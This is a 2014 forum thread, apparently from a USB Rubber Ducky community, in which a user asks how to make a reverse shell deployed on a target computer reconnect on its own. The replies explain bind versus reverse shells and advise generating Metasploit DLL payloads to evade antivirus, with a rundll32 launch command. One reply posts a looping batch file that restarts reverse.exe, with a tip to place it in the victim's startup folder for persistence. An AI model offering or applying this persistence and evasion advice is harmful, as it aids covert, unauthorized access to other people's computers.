MB60893 Posted January 12, 2014
Having used the duck to deploy the reverse shell which Darren originally posted on GitHub, I am frequently annoyed that you are required to have a netcat listener up before the reverse shell is opened, and if you disconnect, you can't connect again without opening the reverse.exe file again and specifying the IP address etc. Shannon recently did her segment on a 20 second Mac hack, where she used code by Patrick Mosca. This code is designed so that even if netcat disconnects from the computer, you will still be able to reconnect again after 60 seconds. What I want to do is modify Darren's original code so that after 60 seconds or so, it checks if there is a connection or not, and if nothing is connected, it will rebroadcast to the host name or IP address, waiting for netcat to catch the shell. I can't understand Darren's code (no offense Darren, I am new to the coding world :)) and I need to have this capability. Can someone please help me modify the code? Many Thanks, MB60893.
MB60893 (Author) Posted January 13, 2014
Please help guys! I am really stuck with this!!
no42 Posted January 14, 2014
You could read up on http://www.akadia.com/services/windows_registry.html
MB60893 (Author) Posted January 14, 2014 (edited)
Quoting no42: "you could read up on http://www.akadia.com/services/windows_registry.html"
While this is good, it will create multiple instances of the program every 60 seconds if run as a registry command. I still want to keep it simple as well, so I think that modifying the VBScript 'decoder.vbs' is the best bet. What I essentially need to do is recode Darren's reverse shell and add in something which says "If Not Connected, rebroadcast the signal." Can someone please help with this? I need some help and soon!
Edited January 14, 2014 by MB60893
Xcellerator Posted January 18, 2014
What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding its shell to a port that you connect to. A reverse shell works by the target computer connecting to you over a port and then providing the shell. Both have the same effect but achieve it in very different ways.
MB60893 (Author) Posted January 18, 2014
Quoting Xcellerator: "What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding its shell to a port that you connect to. A reverse shell works by the target computer connecting to you over a port and then providing the shell. Both have the same effect but achieve it in very different ways."
OK, thanks for clearing that up about the bind shell, however that still doesn't really help me with my problem of recoding the reverse shell to make it a bind shell. Help is still needed! Please help me!
Xcellerator Posted January 19, 2014
I'd recommend using the Metasploit framework. I make all my shells through it. It's better than using the same exe every time cos you can add encoding options and even run the whole connection over HTTPS rather than TCP. Seeing as you're using the ducky, I'd recommend generating a DLL rather than an exe - much lower AV detection rate. Run a DLL using this:
rundll32.exe file.dll, @DllMain12
Haxineer1337 Posted January 19, 2014
Quoting MB60893: "OK, thanks for clearing that up about the bind shell, however that still doesn't really help me with my problem of recoding the reverse shell to make it a bind shell. Help is still needed! Please help me!"
I am going to try to make a PowerShell script to do so. It might be a day or two.
Haxineer1337 Posted January 19, 2014 (edited)
I think this would work:

[BATCH FILE]
@echo off
:TOP
/t timeout 60
powershell Stop-Process -processname C:\reverse.exe
powershell Start-Process C:\reverse.exe
GOTO TOP
[SAVE IT AS A .BAT file.]

The only problem is that it kinda restarts the program even if it's running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder.
Edited January 19, 2014 by Haxineer1337
MB60893 (Author) Posted January 19, 2014
Quoting Haxineer1337: "I think this would work: [BATCH FILE] @echo off :TOP /t timeout 60 powershell Stop-Process -processname C:\reverse.exe powershell Start-Process C:\reverse.exe GOTO TOP [SAVE IT AS A .BAT file.] The only problem is that it kinda restarts the program even if it's running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder."
While this is a good idea, I still only wish to modify the source code, hence why I am still leaving this thread as unsolved. Thanks everyone so far, but please keep these ideas coming!